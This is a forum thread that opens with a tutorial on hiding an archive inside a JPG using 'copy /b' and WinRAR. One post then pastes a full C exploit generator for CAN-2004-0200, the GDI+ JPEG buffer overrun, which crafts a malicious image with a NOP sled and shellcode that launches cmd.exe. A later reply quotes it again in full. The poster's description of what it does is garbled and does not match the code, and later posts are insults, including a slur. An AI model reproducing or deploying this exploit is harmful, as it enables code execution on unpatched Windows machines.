User Controls

Hiding Files in Images WITHOUT Steganography Software

  1. #1
    Hewfil1 Houston
    [FONT=Open Sans][SIZE=17px]We all want to share some secret stuff with our friends but we are unable to do so because of lack of privacy. If we send the Top Secret file using pendrive, then any person can check that very easily.If we want to make our content more secret and secure, we can easily hide our secret file in any image without using any software.[/SIZE][/FONT]
    [FONT=Open Sans][SIZE=17px]Both, the sender and receiver need only WINRAR. If you don’t have winrar, then download it for free from here. Follow the steps below to hide any file in an image.[/SIZE][/FONT]
    [FONT=Open Sans][SIZE=17px]SENDER:
    Step 1.)
    Create a new folder with any name and send all the content to it which you want to hide.[/SIZE][/FONT]

    [FONT=Open Sans][SIZE=17px]Step 2.) Once your folder is ready, right click on it and click on add to archive. Remember either it is a ZIP or a RAR file.[/SIZE][/FONT]
    [FONT=Open Sans][SIZE=17px]Step 3.) Now put your archived file and the image in which you want to hide content in the same DRIVE.[/SIZE][/FONT]
    [FONT=Open Sans][SIZE=17px]Step 4.) Now open Command Prompt (cmd).[/SIZE][/FONT]
    [FONT=Open Sans][SIZE=17px]Step 5.) Go to the directory or drive in which you are. Use CD / to go back a folder of CD name/ to go to the next folder.[/SIZE][/FONT]
    [FONT=Open Sans][SIZE=17px]Step 6.) Once your CMD is in the same directory as your files, type the following command.[/SIZE][/FONT]
    [FONT=Open Sans][SIZE=17px]copy /b image.jpg + archived.rar newimagename.jpg[/SIZE][/FONT]
    [FONT=Open Sans][SIZE=17px]Replace the name of your files in the command above.[/SIZE][/FONT]
    [FONT=Open Sans][SIZE=17px]Now you can see a new image with the name newimagename.jpg which is much heavier in size and contains your secret file. You can send this file to anyone you want and no other person will be able to see anything except the image itself. Now the person whom you will send the file should follow the steps mentioned below to see the hidden files.

    RECIEVER:[/SIZE][/FONT]

    [FONT=Open Sans][SIZE=17px]Step 1.) Click on Windows icon and search for WINRAR.[/SIZE][/FONT]
    [FONT=Open Sans][SIZE=17px]Step 2.) Now press Ctrl + O.[/SIZE][/FONT]
    [FONT=Open Sans][SIZE=17px]Step 3.) Go to the location where image is saved. Make sure to select All files from the dropdown box to see your image.[/SIZE][/FONT]
    [FONT=Open Sans][SIZE=17px]Step 4) Open that image. You will be able to see all the files that are hidden in that image.[/SIZE][/FONT]
  2. #2
    Sophie Pedophile Tech Support
    Put a password on that RAR while you're at it. Also, would only recommend this for nosey roommates, lulz.
  3. #3
    Lanny Youth Mutton Buster Champion
    Yee, it's probably worth pointing out this won't pass muster with law enforcement
  4. #4
    -SpectraL coward [the spuriously bluish-lilac bushman]
    It is also possible to use the JPEG exploit and .jpg file to link to a remote file in such a way that the file will be inaccessible to anyone not on the white list. Other variations of the technique are possible.


    // CAN-2004-0200 // launch a local cmd.exe (not bound to the net)... // GDI+ buffer overrun exploit by FoToZ // NB: the headers here are only sample headers taken from a .JPG file, // with the FF FE 00 01 inserted in header1. // Sample shellcode is provided // You can put approx. 2500 bytes of shellcode...who needs that much anyway // Tested on an unpatched WinXP SP1 #include <direct.h> #include <stdio.h> char shellcode[]= "\x68" // push "cmd " "\x8B\xC4" // mov eax,esp "\x50" // push eax "\xB8\x44\x80\xC2\x77" // mov eax,77c28044h (address of system() on WinXP SP1) "\xFF\xD0" // call eax ; char header1[]= "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64" "\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00" "\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65" "\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19" "\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26" "\x2E\x3E\x35\x35\x35\x35\x35\x3E"; char setNOPs1[]= "\xE8\x00\x00\x00\x00\x5B\x8D\x8B" "\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8"; char setNOPs2[]= "\x3E\xE8\x00\x00\x00\x00\x5B\x8D\x8B" "\x2F\x00\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8"; char header2[]= "\x44" "\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x01\x15\x19\x19" "\x20\x1C\x20\x26\x18\x18\x26\x36\x26\x20\x26\x36\x44\x36\x2B\x2B" "\x36\x44\x44\x44\x42\x35\x42\x44\x44\x44\x44\x44\x44\x44\x44\x44" "\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" "\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\xFF\xC0\x00" "\x11\x08\x03\x59\x02\x2B\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01" "\xFF\xC4\x00\xA2\x00\x00\x02\x03\x01\x01\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x03\x04\x01\x02\x05\x00\x06\x01\x01\x01\x01" "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02" "\x03\x10\x00\x02\x01\x02\x04\x05\x02\x03\x06\x04\x05\x02\x06\x01" "\x05\x01\x01\x02\x03\x00\x11\x21\x31\x12\x04\x41\x51\x22\x13\x05" "\x61\x32\x71\x81\x42\x91\xA1\xC1\x52\x23\x14\xB1\xD1\x62\x15\xF0" "\xE1\x72\x33\x06\x82\x24\xF1\x92\x43\x53\x34\x16\xA2\xD2\x63\x83" "\x44\x54\x25\x11\x00\x02\x01\x03\x02\x04\x03\x08\x03\x00\x02\x03" "\x01\x00\x00\x00\x00\x01\x11\x21\x31\x02\x41\x12\xF0\x51\x61\x71" "\x81\x91\xA1\xB1\xD1\xE1\xF1\x22\x32\x42\x52\xC1\x62\x13\x72\x92" "\xD2\x03\x23\x82\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00" "\x3F\x00\x0F\x90\xFF\x00\xBC\xDA\xB3\x36\x12\xC3\xD4\xAD\xC6\xDC" "\x45\x2F\xB2\x97\xB8\x9D\xCB\x63\xFD\x26\xD4\xC6\xD7\x70\xA4\x19" "\x24\x50\xCA\x46\x2B\xFC\xEB\x3B\xC7\xC9\xA5\x4A\x8F\x69\x26\xDF" "\x6D\x72\x4A\x9E\x27\x6B\x3E\xE6\x92\x86\x24\x85\x04\xDB\xED\xA9" "\x64\x8E\x6B\x63\x67\x19\x1A\xA5\xE7\xB8\x28\x3D\x09\xAB\x5D\x5F" "\x16\xF7\x8C\xED\x49\x4C\xF5\x01\xE6\xE5\xD5\x1C\x49\xAB\x10\x71" "\xA6\x36\x9B\x93\x24\x61\x00\x0F\x61\xEC\x34\xA7\x9C\x23\xF4\x96" "\xC6\xE6\xAF\xB7\x80\x76\xEF\x93\xF0\xAA\x28\x8A\x6B\xE0\x18\xC0" "\xA4\x9B\x7E\x90\x39\x03\xC2\x90\xDC\x43\x31\x91\x62\x91\x86\x23" "\x35\x35\xA2\x80\x4D\xFA\x72\x31\x07\x9D\x03\x70\xA8\x93\x24\x4F" "\x89\x51\x83\x5E\xA4\x2E\x7A\xC0\x7D\xA9\x8A\x10\x61\x64\x07\xFA" "\x88\xC6\x89\x26\xDA\x0F\x20\xBD\xB9\x16\xD2\xA8\xE8\x91\x3F\x1A" "\xE2\xBA\xF0\xBE\x74\xAB\x1D\xC4\x44\x15\x1A\x8A\x9C\xC7\x2A\x6B" "\xA3\x33\xB7\x1E\x88\x47\x69\xA9\x64\x68\x26\xC1\x97\x0B\xD6\x86" "\x8B\x1B\x29\xC6\x87\xE4\xC7\xFD\xCC\x53\x11\xA5\x9C\x62\x6A\xE5" "\x40\x37\x61\x89\xF6\xB2\x9C\x2A\x7C\xFD\x05\x6A\x30\x5F\x52\x02" "\xEB\x72\xBF\x7D\x74\x4C\x23\xB9\x8F\xD8\x78\x67\x54\x59\x64\x47" "\xC5\x75\x21\x18\xD5\xE3\x58\xE1\x72\x63\xBF\x6D\xBD\xCB\xCA\x82" "\x65\xE7\xDB\x09\x54\x4F\x0D\x95\x86\x76\xE3\xF2\xA0\x48\x82\x55" "\xD7\xA6\xCE\xA7\xAA\xDC\x6A\xF1\xA9\x8E\xE0\x35\xC1\xCA\xA1\xD4" "\x93\xD2\xD6\x39\x95\x3C\x6B\x46\x60\xAC\xC1\x3B\x60\xC9\x70\x84" "\x8E\xA1\x9A\x9A\x20\x01\x94\xCA\x08\x91\x53\xDC\x01\xB1\xB5\x12" "\x37\x11\xC6\xC1\xAC\xF1\x11\xD4\x9C\x6B\x3E\x69\x76\xF0\x1D\x7B" "\x52\x6D\xC9\xA8\x66\x94\xBB\x79\x8F\x7E\xDE\x17\xFD\x4D\xAB\x1E" "\x76\x7A\xA3\x2B\xE2\x50\x06\xB7\x2C\xEB\x2A\x49\xC9\xEA\x4E\x9B" "\xE7\xCA\xAF\x1E\xEC\x23\xDC\x8B\xE1\x6B\x5F\x1A\x9B\xE8\x49\x2E" "\x63\xE5\x03\x32\xCD\x19\xB8\x23\x10\x78\x1F\x85\x5C\x15\x8C\x97" "\x84\x9B\xDB\x15\x35\x9F\x16\xE0\x1E\x86\xB9\x8F\x97\x11\x4E\xDA" "\x35\x02\x45\x25\x93\xF8\x55\x24\x17\xB9\x1B\xF5\xC8\x07\xA9\xE2" "\x2A\x76\xB0\xC2\x37\x01\x95\xAD\x81\xB6\x1C\x6A\xA2\x38\xD9\xAE" "\xCA\x59\x18\x75\x25\xFF\x00\x81\xAE\xD8\xE8\xBB\x47\x62\xAC\xB7" "\xB6\xA1\x8D\x40\xE3\x86\x65\x6D\x1E\xDB\x89\x2F\x9D\xCD\x6B\x24" "\x62\x41\x61\x89\xAC\x2D\x8B\x3E\xB6\x68\xC0\x63\x73\x70\x6B\x6B" "\x6A\xA1\x7A\xAC\x56\xE7\x11\x56\x58\xD4\x13\xA4\x0B\xB6\xEB\xB3" "\x3B\x47\x22\x95\xD3\x53\x2E\xEA\x19\x86\x96\xF7\x03\x83\x52\x9E" "\x54\xAB\x6E\x58\x63\x7C\x33\xCE\x93\xB1\x19\x1C\xE9\xDB\xAA\x35" "\xBF\x46\x8D\xD4\xD2\x56\xE0\xE0\x33\xA1\x4D\x0A\x4E\x3B\xB1\xCD" "\xD4\x06\x44\x56\x4A\xCD\x24\x26\xEA\x6D\x7A\x87\xDC\x3B\x60\x6D" "\xFC\x2A\x86\x1B\x97\x36\x6D\x42\x04\xA0\x11\xEE\xE7\x46\x22\x35" "\xD5\x26\xB0\x1C\x0B\x7C\x69\x5F\x06\xEC\x5A\xC5\x0B\x46\x70\x27" "\xF2\xD4\x79\xAD\x89\xDA\x30\x74\xBD\x98\xE4\x68\x58\x86\xE4\x1B" "\x69\xB9\xDC\x2B\x30\x87\x48\x53\xC5\x85\x3B\xDD\x8A\x4E\xB5\x42" "\xB2\x8C\x6E\x2C\x01\xF8\x56\x04\x7B\xC9\xA3\x05\x4F\xB4\xD5\xA2" "\xDF\xF6\xFD\xC6\xE2\xA7\x3C\x89\x24\xFE\xA9\x5E\xC3\xD4\x6D\xF7" "\x85\xC9\x59\x39\x63\x59\x9B\xFF\x00\x06\x1A\x5E\xFA\x69\x0A\x46" "\x2B\xC0\x9F\xC2\x91\x8B\xC9\x40\x58\x16\xBD\xF2\xC0\xD3\x3B\x7F" "\x2D\xA9\xBB\x2E\x49\x42\x6D\x52\x70\x39\x62\x9F\x08\x73\x6F\x20" "\x09\x64\x00\x01\x83\x2B\x00\xD5\x97\xBC\xDC\xF6\x9C\xA7\x66\xEA" "\xD9\xB6\x9F\xE1\x56\xDE\xBA\xEC\x65\xB4\x44\xD8\xE3\x8D\x52\x2F" "\x36\xCE\x74\x33\x7E\x9F\x2E\x22\x99\x8B\xC9\x6D\x5A\x6D\x9E\xA8" "\x22\xC7\x0C\xA8\x62\x3D\x17\x1D\x2F\xC8\xFA\xD4\xB0\x9E\x14\x45" "\x45\xD5\x6E\x96\x04\xE1\xF1\xA0\x37\x90\x5B\xD8\x7F\x81\x57\x1B" "\xC8\xD5\x48\x27\x0E\x3C\x6B\x3D\xCD\x44\x15\x92\x41\x25\x94\x82" "\xAE\x0E\x42\x97\x8D\x8C\x6D\xAE\x56\xB8\x26\xD8\x0F\xE3\x43\x93" "\x73\x18\x75\x28\xD7\xF8\xD5\xFF\x00\x74\xE4\x18\xC2\x82\xAC\x6F" "\x86\x7F\x2A\x4C\xBE\xE5\xFC\xD2\x22\xCC\x9A\x32\xD1\x7C\x7D\x68" ; void main() { FILE *fin,*fout; unsigned int i=0,j=0; unsigned char c; mkdir("FoToZ_JPEG"); fout=fopen("FoToZ_JPEG\\FoToZ.jpg","wb"); if( !fout ) { printf("ERROR OPENING FILES\n"); return; } printf("shellcode size is %u bytes\n", sizeof(shellcode)-1); for(i=0;i<sizeof(shellcode)-1;i++) if( 0xD9FF == *(unsigned short *)&shellcode[i] ) { printf("WARNING: SHELLCODE CONTAINS FFh D9h\n" "FIX UR SHELLCODE\n"); return; } j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3; for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout); for(i=0;i<sizeof(setNOPs1)-1;i++) fputc(setNOPs1[i],fout); for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout); for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs j=i; for(i=0;i<sizeof(shellcode)-1;i++) fputc(shellcode[i],fout); for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout); // stuff NOPs // (stuffing NOPs is becoming a bad habit) for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout); fprintf(fout,"\xFF\xD9"); fcloseall(); }
  5. #5
    Lanny Youth Mutton Buster Champion
    It is also possible to use the JPEG exploit and .jpg file to link to a remote file in such a way that the file will be inaccessible to anyone not on the white list. Other variations of the technique are possible.


    // CAN-2004-0200 // launch a local cmd.exe (not bound to the net)... // GDI+ buffer overrun exploit by FoToZ // NB: the headers here are only sample headers taken from a .JPG file, // with the FF FE 00 01 inserted in header1. // Sample shellcode is provided // You can put approx. 2500 bytes of shellcode...who needs that much anyway // Tested on an unpatched WinXP SP1 #include <direct.h> #include <stdio.h> char shellcode[]= "\x68" // push "cmd " "\x8B\xC4" // mov eax,esp "\x50" // push eax "\xB8\x44\x80\xC2\x77" // mov eax,77c28044h (address of system() on WinXP SP1) "\xFF\xD0" // call eax ; char header1[]= "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64" "\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00" "\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65" "\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19" "\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26" "\x2E\x3E\x35\x35\x35\x35\x35\x3E"; char setNOPs1[]= "\xE8\x00\x00\x00\x00\x5B\x8D\x8B" "\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8"; char setNOPs2[]= "\x3E\xE8\x00\x00\x00\x00\x5B\x8D\x8B" "\x2F\x00\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8"; char header2[]= "\x44" "\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x01\x15\x19\x19" "\x20\x1C\x20\x26\x18\x18\x26\x36\x26\x20\x26\x36\x44\x36\x2B\x2B" "\x36\x44\x44\x44\x42\x35\x42\x44\x44\x44\x44\x44\x44\x44\x44\x44" "\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" "\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\xFF\xC0\x00" "\x11\x08\x03\x59\x02\x2B\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01" "\xFF\xC4\x00\xA2\x00\x00\x02\x03\x01\x01\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x03\x04\x01\x02\x05\x00\x06\x01\x01\x01\x01" "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02" "\x03\x10\x00\x02\x01\x02\x04\x05\x02\x03\x06\x04\x05\x02\x06\x01" "\x05\x01\x01\x02\x03\x00\x11\x21\x31\x12\x04\x41\x51\x22\x13\x05" "\x61\x32\x71\x81\x42\x91\xA1\xC1\x52\x23\x14\xB1\xD1\x62\x15\xF0" "\xE1\x72\x33\x06\x82\x24\xF1\x92\x43\x53\x34\x16\xA2\xD2\x63\x83" "\x44\x54\x25\x11\x00\x02\x01\x03\x02\x04\x03\x08\x03\x00\x02\x03" "\x01\x00\x00\x00\x00\x01\x11\x21\x31\x02\x41\x12\xF0\x51\x61\x71" "\x81\x91\xA1\xB1\xD1\xE1\xF1\x22\x32\x42\x52\xC1\x62\x13\x72\x92" "\xD2\x03\x23\x82\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00" "\x3F\x00\x0F\x90\xFF\x00\xBC\xDA\xB3\x36\x12\xC3\xD4\xAD\xC6\xDC" "\x45\x2F\xB2\x97\xB8\x9D\xCB\x63\xFD\x26\xD4\xC6\xD7\x70\xA4\x19" "\x24\x50\xCA\x46\x2B\xFC\xEB\x3B\xC7\xC9\xA5\x4A\x8F\x69\x26\xDF" "\x6D\x72\x4A\x9E\x27\x6B\x3E\xE6\x92\x86\x24\x85\x04\xDB\xED\xA9" "\x64\x8E\x6B\x63\x67\x19\x1A\xA5\xE7\xB8\x28\x3D\x09\xAB\x5D\x5F" "\x16\xF7\x8C\xED\x49\x4C\xF5\x01\xE6\xE5\xD5\x1C\x49\xAB\x10\x71" "\xA6\x36\x9B\x93\x24\x61\x00\x0F\x61\xEC\x34\xA7\x9C\x23\xF4\x96" "\xC6\xE6\xAF\xB7\x80\x76\xEF\x93\xF0\xAA\x28\x8A\x6B\xE0\x18\xC0" "\xA4\x9B\x7E\x90\x39\x03\xC2\x90\xDC\x43\x31\x91\x62\x91\x86\x23" "\x35\x35\xA2\x80\x4D\xFA\x72\x31\x07\x9D\x03\x70\xA8\x93\x24\x4F" "\x89\x51\x83\x5E\xA4\x2E\x7A\xC0\x7D\xA9\x8A\x10\x61\x64\x07\xFA" "\x88\xC6\x89\x26\xDA\x0F\x20\xBD\xB9\x16\xD2\xA8\xE8\x91\x3F\x1A" "\xE2\xBA\xF0\xBE\x74\xAB\x1D\xC4\x44\x15\x1A\x8A\x9C\xC7\x2A\x6B" "\xA3\x33\xB7\x1E\x88\x47\x69\xA9\x64\x68\x26\xC1\x97\x0B\xD6\x86" "\x8B\x1B\x29\xC6\x87\xE4\xC7\xFD\xCC\x53\x11\xA5\x9C\x62\x6A\xE5" "\x40\x37\x61\x89\xF6\xB2\x9C\x2A\x7C\xFD\x05\x6A\x30\x5F\x52\x02" "\xEB\x72\xBF\x7D\x74\x4C\x23\xB9\x8F\xD8\x78\x67\x54\x59\x64\x47" "\xC5\x75\x21\x18\xD5\xE3\x58\xE1\x72\x63\xBF\x6D\xBD\xCB\xCA\x82" "\x65\xE7\xDB\x09\x54\x4F\x0D\x95\x86\x76\xE3\xF2\xA0\x48\x82\x55" "\xD7\xA6\xCE\xA7\xAA\xDC\x6A\xF1\xA9\x8E\xE0\x35\xC1\xCA\xA1\xD4" "\x93\xD2\xD6\x39\x95\x3C\x6B\x46\x60\xAC\xC1\x3B\x60\xC9\x70\x84" "\x8E\xA1\x9A\x9A\x20\x01\x94\xCA\x08\x91\x53\xDC\x01\xB1\xB5\x12" "\x37\x11\xC6\xC1\xAC\xF1\x11\xD4\x9C\x6B\x3E\x69\x76\xF0\x1D\x7B" "\x52\x6D\xC9\xA8\x66\x94\xBB\x79\x8F\x7E\xDE\x17\xFD\x4D\xAB\x1E" "\x76\x7A\xA3\x2B\xE2\x50\x06\xB7\x2C\xEB\x2A\x49\xC9\xEA\x4E\x9B" "\xE7\xCA\xAF\x1E\xEC\x23\xDC\x8B\xE1\x6B\x5F\x1A\x9B\xE8\x49\x2E" "\x63\xE5\x03\x32\xCD\x19\xB8\x23\x10\x78\x1F\x85\x5C\x15\x8C\x97" "\x84\x9B\xDB\x15\x35\x9F\x16\xE0\x1E\x86\xB9\x8F\x97\x11\x4E\xDA" "\x35\x02\x45\x25\x93\xF8\x55\x24\x17\xB9\x1B\xF5\xC8\x07\xA9\xE2" "\x2A\x76\xB0\xC2\x37\x01\x95\xAD\x81\xB6\x1C\x6A\xA2\x38\xD9\xAE" "\xCA\x59\x18\x75\x25\xFF\x00\x81\xAE\xD8\xE8\xBB\x47\x62\xAC\xB7" "\xB6\xA1\x8D\x40\xE3\x86\x65\x6D\x1E\xDB\x89\x2F\x9D\xCD\x6B\x24" "\x62\x41\x61\x89\xAC\x2D\x8B\x3E\xB6\x68\xC0\x63\x73\x70\x6B\x6B" "\x6A\xA1\x7A\xAC\x56\xE7\x11\x56\x58\xD4\x13\xA4\x0B\xB6\xEB\xB3" "\x3B\x47\x22\x95\xD3\x53\x2E\xEA\x19\x86\x96\xF7\x03\x83\x52\x9E" "\x54\xAB\x6E\x58\x63\x7C\x33\xCE\x93\xB1\x19\x1C\xE9\xDB\xAA\x35" "\xBF\x46\x8D\xD4\xD2\x56\xE0\xE0\x33\xA1\x4D\x0A\x4E\x3B\xB1\xCD" "\xD4\x06\x44\x56\x4A\xCD\x24\x26\xEA\x6D\x7A\x87\xDC\x3B\x60\x6D" "\xFC\x2A\x86\x1B\x97\x36\x6D\x42\x04\xA0\x11\xEE\xE7\x46\x22\x35" "\xD5\x26\xB0\x1C\x0B\x7C\x69\x5F\x06\xEC\x5A\xC5\x0B\x46\x70\x27" "\xF2\xD4\x79\xAD\x89\xDA\x30\x74\xBD\x98\xE4\x68\x58\x86\xE4\x1B" "\x69\xB9\xDC\x2B\x30\x87\x48\x53\xC5\x85\x3B\xDD\x8A\x4E\xB5\x42" "\xB2\x8C\x6E\x2C\x01\xF8\x56\x04\x7B\xC9\xA3\x05\x4F\xB4\xD5\xA2" "\xDF\xF6\xFD\xC6\xE2\xA7\x3C\x89\x24\xFE\xA9\x5E\xC3\xD4\x6D\xF7" "\x85\xC9\x59\x39\x63\x59\x9B\xFF\x00\x06\x1A\x5E\xFA\x69\x0A\x46" "\x2B\xC0\x9F\xC2\x91\x8B\xC9\x40\x58\x16\xBD\xF2\xC0\xD3\x3B\x7F" "\x2D\xA9\xBB\x2E\x49\x42\x6D\x52\x70\x39\x62\x9F\x08\x73\x6F\x20" "\x09\x64\x00\x01\x83\x2B\x00\xD5\x97\xBC\xDC\xF6\x9C\xA7\x66\xEA" "\xD9\xB6\x9F\xE1\x56\xDE\xBA\xEC\x65\xB4\x44\xD8\xE3\x8D\x52\x2F" "\x36\xCE\x74\x33\x7E\x9F\x2E\x22\x99\x8B\xC9\x6D\x5A\x6D\x9E\xA8" "\x22\xC7\x0C\xA8\x62\x3D\x17\x1D\x2F\xC8\xFA\xD4\xB0\x9E\x14\x45" "\x45\xD5\x6E\x96\x04\xE1\xF1\xA0\x37\x90\x5B\xD8\x7F\x81\x57\x1B" "\xC8\xD5\x48\x27\x0E\x3C\x6B\x3D\xCD\x44\x15\x92\x41\x25\x94\x82" "\xAE\x0E\x42\x97\x8D\x8C\x6D\xAE\x56\xB8\x26\xD8\x0F\xE3\x43\x93" "\x73\x18\x75\x28\xD7\xF8\xD5\xFF\x00\x74\xE4\x18\xC2\x82\xAC\x6F" "\x86\x7F\x2A\x4C\xBE\xE5\xFC\xD2\x22\xCC\x9A\x32\xD1\x7C\x7D\x68" ; void main() { FILE *fin,*fout; unsigned int i=0,j=0; unsigned char c; mkdir("FoToZ_JPEG"); fout=fopen("FoToZ_JPEG\\FoToZ.jpg","wb"); if( !fout ) { printf("ERROR OPENING FILES\n"); return; } printf("shellcode size is %u bytes\n", sizeof(shellcode)-1); for(i=0;i<sizeof(shellcode)-1;i++) if( 0xD9FF == *(unsigned short *)&shellcode[i] ) { printf("WARNING: SHELLCODE CONTAINS FFh D9h\n" "FIX UR SHELLCODE\n"); return; } j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3; for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout); for(i=0;i<sizeof(setNOPs1)-1;i++) fputc(setNOPs1[i],fout); for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout); for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs j=i; for(i=0;i<sizeof(shellcode)-1;i++) fputc(shellcode[i],fout); for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout); // stuff NOPs // (stuffing NOPs is becoming a bad habit) for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout); fprintf(fout,"\xFF\xD9"); fcloseall(); }


    What do you even think that means?
  6. #6
    -SpectraL coward [the spuriously bluish-lilac bushman]
    What do you even think that means?

    It just means there's more than one way to skin a cat, that's all.
  7. #7
    Sophie Pedophile Tech Support
    If i really had to hide something i'd probably encrypt it and put it in an alternate data stream.
  8. #8
    It just means there's more than one way to skin a cat, that's all.
    Translation: Fuck if he knows
  9. #9
    Lanny Youth Mutton Buster Champion
    ugh, whatever blood, I don't have the energy to do the usual song and dance around your cargo-cult cracking. I do wonder who you think your audience is though. When you copy-paste these random context-less chunks of poorly formatted code trained professionals don't know what the hell you're talking about (it's not just me, I've seen you get the same responses from people better than myself) then who do you think is going to read your post and understand? If I were a more suspicious soul I'd think you know you're being unclear in hopes that it lends you some kind of credibility in the eyes of people who don't know enough to tell the difference between poor communication and deep technical magic.
  10. #10
    Sophie Pedophile Tech Support
    ugh, whatever blood, I don't have the energy to do the usual song and dance around your cargo-cult cracking. I do wonder who you think your audience is though. When you copy-paste these random context-less chunks of poorly formatted code trained professionals don't know what the hell you're talking about (it's not just me, I've seen you get the same responses from people better than myself) then who do you think is going to read your post and understand? If I were a more suspicious soul I'd think you know you're being unclear in hopes that it lends you some kind of credibility in the eyes of people who don't know enough to tell the difference between poor communication and deep technical magic.

    Lan knows. <3
  11. #11
    Sophie Pedophile Tech Support
    [size=5]SPECTRAL CONJURES THE SPIRITS OF THE COMPUTER WITH HIS SPELLS[/size]
  12. #12
    -SpectraL coward [the spuriously bluish-lilac bushman]
    ugh, whatever blood, I don't have the energy to do the usual song and dance around your cargo-cult cracking. I do wonder who you think your audience is though. When you copy-paste these random context-less chunks of poorly formatted code trained professionals don't know what the hell you're talking about (it's not just me, I've seen you get the same responses from people better than myself) then who do you think is going to read your post and understand? If I were a more suspicious soul I'd think you know you're being unclear in hopes that it lends you some kind of credibility in the eyes of people who don't know enough to tell the difference between poor communication and deep technical magic.

    Do you really think I would stoop to that level?
  13. #13
    -SpectraL coward [the spuriously bluish-lilac bushman]
    Lan knows. <3
    Quiet, you.
  14. #14
    Sophie Pedophile Tech Support
    Quiet, you.

    Make me, faggot.
  15. #15
    For you that would be reaching not stooping.
  16. #16
    Do you really think I would stoop to that level?
    For you that would be reaching not stooping. Prove me wrong by finding the hidden message in the following image.
  17. #17
    -SpectraL coward [the spuriously bluish-lilac bushman]
    For you that would be reaching not stooping. …

    You do not inspire fear in me.
  18. #18
    You do not inspire fear in me.
    You do not inspire anything in anyone.
  19. #19
    -SpectraL coward [the spuriously bluish-lilac bushman]
    You do not inspire anything in anyone.


    I'm ignoring you.
  20. #20
    Hewfil1 Houston
    Y'all really need to keep this marital bitching in private. Stop fucking up threads. Please guys. Y'all may not like eachother, bu I've never seen reason to fully hate you guys. So just keep it to a minimum.
Jump to Top